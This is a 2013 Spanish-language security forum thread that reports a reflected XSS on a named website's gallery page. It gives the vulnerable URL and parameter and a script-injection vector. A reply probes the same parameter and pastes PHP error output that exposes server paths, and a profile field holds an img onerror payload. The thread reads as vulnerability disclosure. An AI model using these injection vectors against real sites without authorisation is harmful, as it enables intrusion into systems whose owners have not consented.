[Reflected XSS] Nilswogram.com

  • 2 Respuestas
  • 1550 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado F0M3T

  • *
  • Ex-Staff
  • *****
  • Mensajes: 176
  • Actividad:
    0%
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
    • f0m3t blogsgsgsgsdfñsadf

[Reflected XSS] Nilswogram.com

  • en: Abril 07, 2013, 09:40:07 pm
Url: http://www.nilswogram.com
Url afectado: http://www.nilswogram.com/public/gallery.php?id=5
Vector: "><script>alert(/F0M3T - UNDERC[0]DE/);</script>
Imagen:


Reportado: Sí.

« Última modificación: Enero 08, 2015, 02:34:27 pm por Expermicid »

Esto no se trata de ganar, se trata de no perder.

Desconectado Jimeno

  • *
  • Ex-Staff
  • *****
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Skype: migueljimeno96
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
    • Ver Perfil
    • Twitter

Re:[Reflected XSS] Nilswogram.com

  • en: Abril 08, 2013, 10:10:37 am
Creo que también tenga SQLi, mira:
 URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
Citar
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Contacto: @migueljimeno96 -

Desconectado F0M3T

  • *
  • Ex-Staff
  • *****
  • Mensajes: 176
  • Actividad:
    0%
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
    • f0m3t blogsgsgsgsdfñsadf

Re:[Reflected XSS] Nilswogram.com

  • en: Abril 08, 2013, 05:15:25 pm
Creo que también tenga SQLi, mira:
 URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
Citar
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Sí me percaté de esa vulnerabilidad, pero no se puede explotar, gracias por la aclaración.
Saludos.

Esto no se trata de ganar, se trata de no perder.